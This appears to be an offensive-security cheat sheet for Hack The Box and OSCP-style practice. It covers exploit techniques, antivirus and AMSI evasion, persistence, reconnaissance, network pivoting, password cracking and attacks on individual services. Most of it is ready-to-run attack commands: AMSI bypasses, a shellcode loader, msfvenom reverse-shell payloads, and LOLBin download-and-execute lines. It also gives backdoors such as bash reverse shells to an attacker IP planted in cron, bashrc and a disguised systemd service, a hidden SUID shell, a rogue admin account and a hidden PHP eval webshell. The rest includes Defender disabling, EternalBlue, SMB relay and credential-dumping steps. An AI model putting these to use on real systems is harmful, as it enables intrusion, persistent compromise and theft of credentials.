gdb ./vuln          # install pwndbg: much better than vanilla gdb

pwndbg> cyclic 200

pwndbg> run

pwndbg> cyclic -l $rsp  # find offset from crash

ltrace ./vuln       # trace library calls

strace ./vuln       # trace syscalls

strings ./vuln      # find hardcoded strings

objdump -d ./vuln   # disassemble

PROTECTION MECHANISMS

Stack Canary  → random value guards EIP

Bypass: leak canary value first

NX / DEP      → stack not executable

Bypass: ROP chains, ret2libc

ASLR          → randomize memory layout

Bypass: leak pointer, brute force

PIE           → randomize binary base

Bypass: leak ELF address

RELRO (Full)  → GOT is read-only

Bypass: overwrite other writable regions

GDB / PWNDBG COMMANDS

r          run program

r < input  run with file input

ni         next instruction (step over)

si         step into call

b *0x1234  breakpoint at address

x/20x $esp examine 20 hex words at esp

x/s $eax   examine string at eax

i r        show all registers

vmmap      show memory mappings

checksec   show binary protections

rop        list ROP gadgets (pwndbg)

got        show GOT entries (pwndbg)

Common Exploit Techniques

Technique	Protections Bypassed	When to Use
ret2shellcode	None (stack exec required)	No NX, no ASLR. Classic CTF bof.
ret2libc	NX/DEP	NX on, no PIE/ASLR. Call system("/bin/sh").
ROP chain	NX/DEP	Build call chain from binary gadgets.
ret2plt	NX, partial ASLR	Call PLT stubs to leak libc addresses.
Stack pivot	Limited overflow	Redirect RSP to a controlled region.
Format string	Canary, ASLR	Leak values from stack, overwrite GOT.
Heap exploitation	Stack canary	Use-after-free, double free, tcache poisoning.

💡

Practice resources: pwn.college (guided), pwnable.kr, exploit.education VMs. For OSCP-style Windows BOF: install VulnServer on a Windows VM and practice the full 6-step method until it's muscle memory.

▸AV Evasion & Defense Bypass

// getting past Windows Defender, AMSI, and EDR on harder boxes

⚠

AV evasion appears on Hard/Insane HTB Windows boxes and is essential for real engagements. These techniques are for authorized testing only. Signatures change constantly — what works today may be flagged tomorrow.

Why Payloads Get Caught

STATIC SIGNATURES

AV scans file bytes against a database. Metasploit stageless payloads are instantly flagged. Solution: encode, encrypt, or change the payload structure entirely.

AMSI (Windows)

Anti-Malware Scan Interface hooks PowerShell, .NET, WScript and others. Scans content in-memory before execution. Must be patched or bypassed before loading tools like Mimikatz via PS.

ETW (Event Tracing)

Windows telemetry that logs process activity for EDR solutions. Can be patched in-memory to blind EDR sensors, but this itself may be flagged on modern systems.

BEHAVIORAL DETECTION

Modern AV watches what code does, not just what it looks like. Spawning cmd.exe from unexpected parents, reading LSASS, or calling suspicious API sequences triggers alerts.

AMSI Bypass Techniques

# Classic AMSI patch (PowerShell) — patches amsiInitFailed
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Obfuscated version (avoids string detection)
$a='System.Management.Automation.A';$b='msiUtils';$c=[Ref].Assembly.GetType($a+$b)
$d=$c.GetField('amsiInitFailed','NonPublic,Static');$d.SetValue($null,$true)

# Force error (another classic)
$w=[System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null,$null)

# Alternative: use Invoke-Obfuscation, AMSITrigger to test
# https://github.com/RythmStick/AMSITrigger — scan your scripts first

Payload Obfuscation

# msfvenom with encoding (weak, often caught)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -e x64/xor_dynamic -i 10 -f exe -o shell.exe

# Shikata ga nai (x86 only) — classic polymorphic encoder
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f exe -o double_enc.exe

# Custom C shellcode loader (much harder to detect)
#include <windows.h>
unsigned char shellcode[] = "\xfc\x48\x83..."; // your shellcode
int main() {
void *mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(mem, shellcode, sizeof(shellcode));
((void(*)())mem)();
}
# Cross-compile: x86_64-w64-mingw32-gcc loader.c -o loader.exe

Living Off the Land (LOLBins)

# Download & execute via certutil (very common, often monitored)

certutil.exe -urlcache -split -f http://IP:8080/shell.exe shell.exe && shell.exe

# Execute via regsvr32 (AppLocker bypass, COM scriptlet)

regsvr32 /s /n /u /i:http://IP:8080/payload.sct scrobj.dll

# MSBuild to execute C# project (bypasses AppLocker)

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe payload.csproj

# Rundll32 — execute DLL export

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -c IEX(New-Object Net.WebClient).DownloadString('http://IP/ps.ps1')")

# Full LOLBAS reference: lolbas-project.github.io

PowerShell Execution Policy Bypass

powershell -ExecutionPolicy Bypass -File script.ps1

powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://IP/ps.ps1')"

powershell -nop -noni -w hidden -ep bypass -enc BASE64_ENCODED_COMMAND

# Encode a PowerShell command:

$cmd = 'IEX(New-Object Net.WebClient).DownloadString("http://IP/script.ps1")'

$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)

$enc = [Convert]::ToBase64String($bytes)

echo $enc

Windows Defender Specific

# Check Defender status

Get-MpComputerStatus

sc query WinDefend

# Disable real-time protection (requires admin)

Set-MpPreference -DisableRealtimeMonitoring $true

# Add exclusion path (requires admin)

Add-MpPreference -ExclusionPath "C:\Windows\Temp"

# Check if you can disable from registry

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

▸Persistence Techniques

// maintaining access after reboot — critical on real engagements, tested on harder HTB boxes

⚠

HTB machines reset regularly, so persistence is mainly tested on Hard/Insane boxes. On real engagements, always document every persistence mechanism you install and remove it during cleanup.

SSH Authorized Keys LOW NOISE Linux

# Generate keypair on YOUR machine

ssh-keygen -t ed25519 -f htb_key -N ""

# Add public key to target:

mkdir -p ~/.ssh && chmod 700 ~/.ssh

echo "YOUR_PUBLIC_KEY" >> ~/.ssh/authorized_keys

chmod 600 ~/.ssh/authorized_keys

# Connect from your machine:

ssh -i htb_key user@target

Crontab Backdoor MEDIUM NOISE Linux

# Add reverse shell to user crontab

(crontab -l 2>/dev/null; echo "*/5 * * * * bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'") | crontab -

# Root persistence via /etc/crontab (if root)

echo "*/5 * * * * root bash -i >& /dev/tcp/YOUR_IP/4444 0>&1" >> /etc/crontab

Bash Profile / RC Files LOW NOISE Linux

# Triggers when user logs in or opens terminal

echo "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1 &" >> ~/.bashrc

echo "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1 &" >> ~/.bash_profile

# System-wide (if root):

echo "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1 &" >> /etc/profile

SUID Backdoor Binary HIGH NOISE Linux (root)

# Create SUID bash copy (as root)

cp /bin/bash /tmp/.hidden_bash

chmod +s /tmp/.hidden_bash

# Execute as any user:

/tmp/.hidden_bash -p

Systemd Service Backdoor MEDIUM NOISE Linux (root)

cat > /etc/systemd/system/update-check.service <<EOF

[Unit]

Description=System Update Check

[Service]

ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

Restart=always

RestartSec=60

[Install]

WantedBy=multi-user.target

EOF

systemctl enable update-check.service && systemctl start update-check.service

Registry Run Keys MEDIUM NOISE Windows

# Current user (no admin)
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Windows\Temp\shell.exe" /f
# All users (admin)
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Windows\Temp\shell.exe" /f

Scheduled Tasks MEDIUM NOISE Windows

# Create scheduled task (runs every 5 min)

schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\shell.exe" /sc minute /mo 5 /ru SYSTEM /f

# Or via PowerShell:

$action = New-ScheduledTaskAction -Execute "C:\Windows\Temp\shell.exe"

$trigger = New-ScheduledTaskTrigger -RepetitionInterval (New-TimeSpan -Minutes 5) -Once -At (Get-Date)

Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "WinUpdate" -RunLevel Highest -Force

New Admin User HIGH NOISE Windows (admin)

net user backdoor Pass123! /add

net localgroup administrators backdoor /add

net localgroup "Remote Desktop Users" backdoor /add

# Enable RDP:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow

Golden Ticket (AD) STEALTHY Windows AD (DA)

Forge a Kerberos TGT using krbtgt hash. Valid for 10 years by default. Survives password resets — only invalidated by rotating krbtgt hash twice.

# See Active Directory → Domain Admin tab for full golden ticket steps

impacket-ticketer -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain domain.htb Administrator

# Hide PHP webshell in an image file (appended)

cat legit.jpg malicious.php > legit.php.jpg

# Hide in PHP comment in a legitimate-looking file

<?php /* normal code */ if(isset($_GET['x'])){eval($_GET['x']);} /* /normal code */ ?>

# .htaccess persistence — force PHP execution on any file

echo 'AddType application/x-httpd-php .jpg' >> /var/www/html/.htaccess

# Weevely — encrypted PHP backdoor

weevely generate MYPASSWORD shell.php

weevely http://target/uploads/shell.php MYPASSWORD

# Find all writable web directories

find /var/www -type d -writable 2>/dev/null

▸OSINT & External Recon

// intelligence gathering before you touch the target — critical for Pro Labs and real engagements

Passive Reconnaissance Tools

Shodan

shodan.io

Search internet-exposed services, banners, CVEs by IP or hostname. Use filters like hostname:target.com port:22.

Censys

censys.io

Similar to Shodan. Better for TLS certificate and ASN analysis. Finds services by cert CN/SAN fields.

crt.sh

Certificate transparency log search. Find all subdomains by searching %.target.com. Reveals hidden subdomains.

theHarvester

tool (Kali)

Aggregate emails, subdomains, IPs, URLs from public sources. theHarvester -d target.com -b all.

WHOIS

whois / domaintools

Domain registration info: registrar, contacts, dates, nameservers. Sometimes reveals email addresses and company names.

Wayback Machine

web.archive.org

Find old endpoints, login pages, API versions no longer linked but still live. Goldmine for forgotten content.

LinkedIn / Twitter

social media

Find tech stack from job postings ("We use Django, PostgreSQL, AWS"). Find employee names for username enumeration.

Google Dorks

google.com

Find exposed files, login panels, config leaks. See Google Hacking Database (exploit-db.com/google-hacking-database).

DNS Enumeration Deep Dive

# Basic DNS recon

dig target.htb ANY @10.10.10.X

dig axfr @10.10.10.X target.htb         # zone transfer

nslookup -type=any target.htb 10.10.10.X

# Subdomain brute-forcing

gobuster dns -d target.htb -r 10.10.10.X -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

ffuf -u http://10.10.10.X -H "Host: FUZZ.target.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs SIZE_OF_DEFAULT_RESPONSE

# Reverse DNS lookup

dig -x 10.10.10.X @10.10.10.X

# dnsrecon — comprehensive

dnsrecon -d target.htb -n 10.10.10.X -t axfr,std,brute -D /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt

Google Dork Reference

FILE & DIRECTORY EXPOSURE

Config filessite:target.com ext:conf OR ext:cfg

Log filessite:target.com ext:log

SQL dumpssite:target.com ext:sql

Backup filessite:target.com ext:bak OR ext:old

Git exposedsite:target.com inurl:.git

Directory listingsite:target.com intitle:"Index of"

LOGIN PANELS & ADMIN

Admin pagessite:target.com inurl:admin

Login panelssite:target.com inurl:login

phpMyAdminsite:target.com inurl:phpmyadmin

Credentials in URLsite:target.com inurl:password

Exposed APIssite:target.com inurl:api/v1

GITHUB / CODE RECON

Passwordsorg:company password filename:.env

API keysorg:company api_key filename:config

Private keysorg:company BEGIN RSA PRIVATE KEY

DB stringsorg:company jdbc:mysql password

Network Enumeration (Internal)

# Discover hosts in subnet (from Linux foothold)

for i in $(seq 1 254); do ping -c1 -W1 192.168.1.$i >/dev/null && echo "192.168.1.$i UP"; done &

nmap -sn 192.168.1.0/24 --min-rate 5000

# ARP scan (more reliable, layer 2)

arp-scan -l

netdiscover -r 192.168.1.0/24

# From Windows foothold

for /L %i in (1,1,254) do @ping -n 1 -w 50 192.168.1.%i | find "Reply" >> hosts.txt

arp -a  # already-discovered hosts from ARP cache

Credential OSINT

# Check for breached credentials

# haveibeenpwned.com / dehashed.com

# Username generation from full name

python3 -c "
name = 'John Smith'
f,l = name.lower().split()
patterns = [f, l, f[0]+l, f+l[0], f+'.'+l, f+'_'+l, l+f[0], l+'.'+f]
[print(p) for p in patterns]
"

# LinkedIn username format enumeration:

# firstname.lastname, flastname, firstnamel, etc.

▸Network Pivoting & Tunneling

// reaching internal networks through a compromised host — essential for Pro Labs and multi-host HTB chains

▸

Pivoting means using a compromised machine as a stepping stone to reach otherwise unreachable internal hosts. You land on DMZ → pivot to internal subnet → pivot again to AD domain controller. Every hop uses the techniques here.

Pivot Topology Examples

// SCENARIO 1 — Single hop via compromised web server

Your Machine
10.10.14.5

──VPN──▶

Web Server (pivot)
10.10.10.50

──internal──▶

DB Server
172.16.1.10

✗

not directly reachable

Your Machine

──tunnel──▶

Pivot Host

──proxied──▶

DB Server

✓

reachable via proxy

SSH Local Port Forward — Expose Internal Service

Forward a remote internal port to your local machine. E.g. the DB server at 172.16.1.10:3306 is reachable from the pivot — make it appear as localhost:3306 on your box.

# Syntax: ssh -L [local_port]:[internal_host]:[internal_port] pivot_user@pivot_ip

ssh -L 3306:172.16.1.10:3306 user@10.10.10.50 -N -f

# -N = don't execute remote command  -f = fork to background

# Now connect to 127.0.0.1:3306 on YOUR machine to reach internal DB

mysql -h 127.0.0.1 -P 3306 -u root -p

# Forward multiple ports at once

ssh -L 8080:172.16.1.10:80 -L 443:172.16.1.10:443 -L 22:172.16.1.10:22 user@10.10.10.50 -N

SSH Remote Port Forward — Expose Your Listener on Target

Make a port on the pivot host forward back to a listener on YOUR machine. Used when you need a reverse shell from a host that can only reach the pivot.

# Syntax: ssh -R [remote_port]:[local_host]:[local_port] pivot_user@pivot_ip
ssh -R 4444:127.0.0.1:4444 user@10.10.10.50 -N
# Now a reverse shell on the pivot that connects to localhost:4444
# will actually reach YOUR rlwrap nc -lvnp 4444

# Allow binding on all pivot interfaces (needs GatewayPorts yes in sshd_config)
ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@10.10.10.50 -N

SSH Dynamic SOCKS Proxy — Scan Whole Subnet

# Create SOCKS5 proxy through pivot on local port 1080

ssh -D 1080 user@10.10.10.50 -N -f

# Configure proxychains (edit /etc/proxychains4.conf)

echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf

# Now proxy ANY tool through the pivot

proxychains nmap -sT -Pn -p 80,443,22,445 172.16.1.0/24 2>/dev/null

proxychains evil-winrm -i 172.16.1.20 -u admin -p Pass123!

proxychains curl http://172.16.1.10/admin

Chisel tunnels TCP/UDP over HTTP. Useful when SSH isn't available or outbound HTTP is the only allowed protocol. Download from github.com/jpillora/chisel — use matching versions on both ends.

# ── SERVER (your machine) ──────────────────

./chisel server -p 8000 --reverse --socks5

# ── CLIENT (pivot host) ────────────────────

./chisel client 10.10.14.5:8000 R:socks

# This creates a reverse SOCKS5 proxy on your machine at 127.0.0.1:1080

# ── FORWARD SPECIFIC PORT ──────────────────

# Expose internal RDP (172.16.1.20:3389) as local port 33389

./chisel client 10.10.14.5:8000 R:33389:172.16.1.20:3389

# Then: xfreerdp /v:127.0.0.1:33389 /u:user /p:pass

# ── TRANSFER CHISEL TO TARGET ──────────────

python3 -m http.server 8080

# On Linux target:  wget http://10.10.14.5:8080/chisel -O /tmp/chisel && chmod +x /tmp/chisel

# On Windows:       iwr http://10.10.14.5:8080/chisel.exe -OutFile $env:TEMP\chisel.exe

Ligolo-ng is the modern standard for pivoting. It creates a TUN interface on your machine — no proxychains needed. Tools work natively as if you're on the internal network. Download from github.com/nicocha30/ligolo-ng.

# ── SETUP (your machine) ───────────────────

sudo ip tuntap add user $(whoami) mode tun ligolo

sudo ip link set ligolo up

./proxy -selfcert -laddr 0.0.0.0:11601

# ── CONNECT (pivot target) ─────────────────

./agent -connect 10.10.14.5:11601 -ignore-cert

# Windows: .\agent.exe -connect 10.10.14.5:11601 -ignore-cert

# ── IN PROXY CONSOLE ───────────────────────

session          # select the agent

ifconfig         # see internal interfaces on pivot

start            # start the tunnel

# ── ADD ROUTE (your machine) ───────────────

sudo ip route add 172.16.1.0/24 dev ligolo

# Now scan/attack 172.16.1.x directly — no proxychains!

nmap -sV -sC 172.16.1.20

evil-winrm -i 172.16.1.20 -u admin -p Pass123!

# ── LISTENER (catch reverse shells from internal) ──

listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444

Proxychains Configuration

# /etc/proxychains4.conf — key settings

strict_chain        # use chains in strict order (use dynamic_chain for flexibility)

proxy_dns           # DNS queries also go through proxy

tcp_read_time_out 15000

tcp_connect_time_out 8000

[ProxyList]

socks5 127.0.0.1 1080  # chisel/ssh socks proxy

# Tools that work well with proxychains:

proxychains curl http://172.16.1.10/

proxychains nmap -sT -Pn -p- 172.16.1.10    # -sT required (TCP connect), -Pn required

proxychains sqlmap -u "http://172.16.1.10/?id=1"

proxychains impacket-psexec domain/user:pass@172.16.1.20

proxychains bloodhound-python -u user -p pass -d domain.htb -c All -ns 172.16.1.1

# Tools that DON'T work well (use ligolo instead):

# nmap -sS (raw sockets), ping/ICMP, UDP-based tools

Metasploit Route + SOCKS

# In msfconsole after getting a meterpreter session

use post/multi/manage/autoroute

set SESSION 1

set SUBNET 172.16.1.0/24

run

# Add a SOCKS proxy via MSF

use auxiliary/server/socks_proxy

set SRVPORT 1080

set VERSION 5

run -j

Multi-hop pivoting — chaining through two or more hosts to reach deeply internal systems (e.g., DMZ → internal network → AD domain → isolated VLAN).

// Double-hop topology

You
10.10.14.5

──▶

Pivot 1
10.10.10.50

──▶

Pivot 2
172.16.1.5

──▶

DC
192.168.10.1

# SSH double hop — ProxyJump (-J)

ssh -J user1@10.10.10.50 user2@172.16.1.5

# Chained dynamic proxies

# Step 1: SOCKS proxy through Pivot 1

ssh -D 1080 user@10.10.10.50 -N -f

# Step 2: SOCKS proxy through Pivot 2 (via proxychains through Pivot 1)

proxychains ssh -D 1081 user@172.16.1.5 -N -f

# Add second proxy to proxychains.conf

socks5 127.0.0.1 1080

socks5 127.0.0.1 1081

# Now proxychains reaches 192.168.10.x through both hops

proxychains nmap -sT -Pn -p 88,389,445 192.168.10.1

# Ligolo-ng double hop: run second agent on Pivot 2,

# add another route on your machine for the 3rd subnet

sudo ip route add 192.168.10.0/24 dev ligolo

💡

For multi-hop, ligolo-ng is far cleaner than chained proxychains. Run an agent on each pivot and add routes — all networks become directly accessible from your machine with no tool modification.

▸Wordlist Crafting & Customization

// the right wordlist beats brute force every time — know how to build and tune them

Essential Wordlists — When to Use Each

Wordlist	Best For	Size	Location
rockyou.txt	Password cracking (most HTB boxes)	14M	`/usr/share/wordlists/rockyou.txt`
raft-medium-words	Web dir/file fuzzing — balanced speed/coverage	63k	`SecLists/Discovery/Web-Content/`
raft-large-words	Web fuzzing — thorough scan	119k	`SecLists/Discovery/Web-Content/`
directory-list-2.3-medium	DirBuster-style dir brute force	220k	`SecLists/Discovery/Web-Content/`
subdomains-top1million	Subdomain/vhost enumeration	1M	`SecLists/Discovery/DNS/`
LFI-Jhaddix.txt	LFI path traversal fuzzing	920	`SecLists/Fuzzing/LFI/`
api/api-endpoints	REST API endpoint discovery	14k	`SecLists/Discovery/Web-Content/api/`
common-snmp-community-strings	SNMP community string brute force	120	`SecLists/Discovery/SNMP/`
Default-Credentials	Default username/password combos	varies	`SecLists/Passwords/Default-Credentials/`
xato-net-10-million-passwords	Password spraying (better variety than rockyou)	10M	`SecLists/Passwords/`
best64.rule	hashcat rule — transforms words (case, append numbers)	—	`/usr/share/hashcat/rules/best64.rule`
dive.rule	hashcat rule — more aggressive transforms	—	`/usr/share/hashcat/rules/dive.rule`

CeWL — Target-Specific Wordlist from Website

CeWL spiders a target website and generates a custom wordlist from words found on the site. Extremely effective when the box has a custom CMS or unique terminology — passwords are often based on company/product names.

# Basic CeWL crawl — default depth 2, min word length 3

cewl http://target.htb -w cewl-wordlist.txt

# Deeper crawl with metadata extraction

cewl http://target.htb -d 4 -m 5 --meta -w cewl-deep.txt

# -d depth  -m minimum word length  --meta extract PDF/Word metadata

# Also extract emails (useful for username enumeration)

cewl http://target.htb --email -e -w cewl-words.txt

# Combine CeWL output with rockyou for best results

cat cewl-wordlist.txt /usr/share/wordlists/rockyou.txt | sort -u > combined.txt

Hashcat Rules — Turbocharge Any Wordlist

Rules transform base words automatically (capitalize, append numbers, swap letters). One rule applied to rockyou multiplies your effective wordlist by orders of magnitude.

# Apply best64 rules to rockyou

hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Stack multiple rules (very powerful)

hashcat -m 1000 hashes.txt rockyou.txt -r best64.rule -r /usr/share/hashcat/rules/leetspeak.rule

# Common manual rules for HTB boxes:

# Passwords like: Company2024! Welcome1 Password123

cat > htb.rule <<'EOF'

$1 $2 $3 $!      # append 123!

^! $1 $2 $3     # prepend !, append 123

u $2 $0 $2 $4 $!  # capitalize, append 2024!

EOF

hashcat -m 1000 hashes.txt wordlist.txt -r htb.rule

Wordlist Generator — Build Custom Lists

CUSTOM WORDLIST FROM TARGET CONTEXT

// Enter company/product info above and click GENERATE LIST

Mutating & Combining Wordlists

# Combine two wordlists, remove duplicates

cat list1.txt list2.txt | sort -u > combined.txt

# Filter by length (e.g. passwords 8-20 chars)

awk 'length>=8 && length<=20' rockyou.txt > filtered.txt

# Add common suffixes to every word

while read word; do echo "$word"; echo "${word}123"; echo "${word}!"; echo "${word}2024"; done < base.txt > mutated.txt

# Username permutations from first/last name list

python3 /opt/username-anarchy/username-anarchy --input-file names.txt > usernames.txt

# Extract only unique passwords from a breach dump

cut -d: -f2 breach_dump.txt | sort -u > pass_only.txt

# Lowercase everything

tr '[:upper:]' '[:lower:]' < wordlist.txt > lower.txt

Target-Specific Username Generation

# From full names (firstname.txt and lastname.txt)

while IFS= read -r first; do while IFS= read -r last; do

  echo "$first.$last"

  echo "$first$last"

  echo "${first:0:1}$last"

  echo "$first${last:0:1}"

  echo "$last.$first"

done < last.txt; done < first.txt | tr '[:upper:]' '[:lower:]' | sort -u > users.txt

# Or use a tool:

python3 -c "
names=[('john','smith'),('jane','doe')]
for f,l in names:
    for u in [f,l,f+l,f[0]+l,f+'.'+l,l+f[0],f+l[0]]: print(u.lower())
"

▸Quick Reference Cheatsheet

// the commands you reach for every single session — click any command to copy

Common Ports & Default Attack Vectors

21

FTP

anonymous login · version exploits · writable dirs

22

SSH

user enum (timing) · weak keys · old version CVEs

23

Telnet

cleartext creds · default credentials

25

SMTP

user enum (VRFY/EXPN) · relay abuse · version RCE

53

DNS

zone transfer · subdomain brute · cache poison

80/443

HTTP/S

web attacks · dir enum · vhost fuzzing · CMS exploits

110

POP3

cleartext creds · user enum · brute force

111

RPC

rpcinfo enum · NFS mounts · showmount

135

RPC/DCOM

wmiexec · dcom attacks · enum services

139/445

SMB

null sessions · pass-the-hash · EternalBlue · shares

161

SNMP UDP

community strings · system info dump · config leaks

389/636

LDAP/S

anonymous bind · user/group enum · AD attacks

443

HTTPS

cert CN for hostname · Heartbleed · SSL config

1433

MSSQL

xp_cmdshell · linked servers · default creds sa

1521

Oracle DB

SID enum · default creds · TNS poison

2049

NFS

showmount · no_root_squash · mount shares

3306

MySQL

default creds · UDF RCE · INTO OUTFILE

3389

RDP

BlueKeep · pass-the-hash · credential brute

5985/6

WinRM

evil-winrm · pass-the-hash · PS remoting

6379

Redis

unauth access · config write · RCE via cron

8080/8

Alt HTTP

dev panels · Tomcat · Jenkins · Splunk · Kibana

27017

MongoDB

unauth access · NoSQLi · data dump

88

Kerberos

ASREPRoast · Kerberoast · brute (careful)

5432

PostgreSQL

default creds · COPY TO/FROM · pg_execute

One-Stop Command Cards — Click Any Command to Copy

🔍 INITIAL RECON

Quick nmapnmap -sV -sC -T4 -oN init IP

All portsnmap -p- --min-rate 5000 IP

UDP top100nmap -sU --top-ports 100 IP

Vuln scannmap --script vuln IP

Add hostecho "IP name.htb" >> /etc/hosts

🌐 WEB ENUM

Gobustergobuster dir -u URL -w raft-medium-words.txt -x php,html,txt

FFUF dirsffuf -u URL/FUZZ -w raft-medium-words.txt -mc 200,301,302

VHost fuzzffuf -u http://IP -H "Host: FUZZ.htb" -w subdomains.txt -fs SIZE

Fingerprintwhatweb http://IP && curl -I http://IP

SSL certopenssl s_client -connect IP:443 2>/dev/null | openssl x509 -noout -text

📁 SMB ENUM

List sharessmbclient -L //IP -N

Share permssmbmap -H IP -u anonymous

Full enumenum4linux -a IP | tee enum4.txt

Connectsmbclient //IP/share -U user%pass

CMEcrackmapexec smb IP -u user -p pass --shares

🔐 SHELLS

Listenerrlwrap nc -lvnp 4444

Bash revbash -i >& /dev/tcp/IP/4444 0>&1

Upgradepython3 -c 'import pty;pty.spawn("/bin/bash")'

Stable TTYexport TERM=xterm; Ctrl+Z; stty raw -echo; fg

HTTP servepython3 -m http.server 8080

⬆️ LINUX PRIVESC

Sudo permssudo -l

SUIDfind / -perm -4000 -type f 2>/dev/null

Crontabscat /etc/crontab; crontab -l; ls /etc/cron.d

Capabilitiesgetcap -r / 2>/dev/null

LinPEAScurl http://IP:8080/linpeas.sh | bash

🪟 WINDOWS PRIVESC

Privswhoami /priv

Groupswhoami /groups

System infosysteminfo | findstr /B /C:"OS"

Serviceswmic service get name,pathname,startmode

WinPEAS.\winPEASx64.exe quiet

🏰 ACTIVE DIRECTORY

ASREPRoastGetNPUsers.py domain/ -usersfile u.txt -format hashcat -dc-ip IP

KerberoastGetUserSPNs.py domain/user:pass -dc-ip IP -request

PtHpsexec.py domain/user@IP -hashes :HASH

DCSyncsecretsdump.py domain/user:pass@IP

BloodHoundbloodhound-python -u u -p p -d domain -c All -ns IP

🔑 PASSWORD CRACKING

NTLMhashcat -m 1000 hash.txt rockyou.txt

SHA256hashcat -m 1400 hash.txt rockyou.txt

bcrypthashcat -m 3200 hash.txt rockyou.txt

Kerberoasthashcat -m 13100 tgs.txt rockyou.txt

Identifyhaiti 'HASH_STRING'

🚇 PIVOTING

SSH localssh -L 8080:INTERNAL:80 user@pivot -N

SSH SOCKSssh -D 1080 user@pivot -N

Chisel srvchisel server -p 8000 --reverse --socks5

Chisel clichisel client YOURIP:8000 R:socks

Proxychainsproxychains nmap -sT -Pn -p- INTERNAL_IP

📤 FILE TRANSFER

HTTP servepython3 -m http.server 8080

wgetwget http://YOURIP:8080/file -O /tmp/file

PS downloadiwr http://YOURIP:8080/file -OutFile $env:TEMP\file

SMB shareimpacket-smbserver share . -smb2support

certutilcertutil -urlcache -split -f http://IP/file file

🔍 POST EXPLOITATION

Who am Iid && whoami && hostname && ip a

User flagfind / -name user.txt 2>/dev/null

Creds huntgrep -r "password" /var/www 2>/dev/null

SSH keysfind / -name id_rsa 2>/dev/null

Historycat ~/.bash_history ~/.zsh_history 2>/dev/null

🌍 SERVICES QUICK HIT

FTP anonftp IP (user: anonymous pass: blank)

NFS mountshowmount -e IP && mount -t nfs IP:/share /mnt

SNMPsnmpwalk -c public -v2c IP

Redisredis-cli -h IP ping && redis-cli -h IP info

MSSQLmssqlclient.py user:pass@IP -windows-auth

Machine Progress Tracker

// click a machine to mark as owned — tracks your progress

▸Services Deep Dive

// how to attack every common service you'll encounter — beyond basic enumeration

SMB Enumeration to Exploitation Chain

# Step 1 — Basic enumeration

nmap -p 445 --script smb-vuln-ms17-010,smb-security-mode,smb-enum-shares,smb-os-discovery 10.10.10.X

crackmapexec smb 10.10.10.X  # OS, signing, hostname at a glance

# Step 2 — Null / anonymous session

smbclient -L //10.10.10.X -N

smbmap -H 10.10.10.X -u "" -p ""

enum4linux-ng -A 10.10.10.X | tee smb-enum.txt

# Step 3 — Browse readable shares

smbclient //10.10.10.X/SHARENAME -N

smb: \> recurse ON; prompt OFF; mget *  # download everything

# Step 4 — Authenticated enumeration

crackmapexec smb 10.10.10.X -u user -p pass --shares --users --groups --sessions

crackmapexec smb 10.10.10.X -u user -p pass -M spider_plus  # list all files

# Step 5 — RCE if creds + admin share accessible

impacket-psexec domain/user:pass@10.10.10.X

impacket-smbexec domain/user:pass@10.10.10.X

impacket-wmiexec domain/user:pass@10.10.10.X

EternalBlue (MS17-010) Manual Exploitation

# Check vulnerability

nmap -p 445 --script smb-vuln-ms17-010 10.10.10.X

# Metasploit (easiest)

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS 10.10.10.X && set LHOST tun0 && run

# Manual (github.com/3ndG4me/AutoBlue-MS17-010)

python eternal_checker.py 10.10.10.X

./shell_prep.sh  # generate shellcode

python eternalblue_exploit7.py 10.10.10.X shellcode/sc_x64.bin

SMB Relay Attack (No Signing)

# Check if signing disabled (required for relay)

crackmapexec smb 10.10.10.0/24 --gen-relay-list relay_targets.txt

# Disable SMB/HTTP in Responder config, then run it

sed -i 's/SMB = On/SMB = Off/g; s/HTTP = On/HTTP = Off/g' /etc/responder/Responder.conf

responder -I tun0 -rdw

# Relay captured hashes to targets

impacket-ntlmrelayx -tf relay_targets.txt -smb2support -i

# With -i: opens interactive SMB shell on successful relay

# Without -i: dumps SAM database automatically

MSSQL — Full Attack Chain

# Connect (default creds: sa / blank, sa / sa, sa / Password1)

impacket-mssqlclient sa@10.10.10.X -windows-auth

impacket-mssqlclient domain/user:pass@10.10.10.X -windows-auth

# Enable xp_cmdshell for OS command execution

EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;

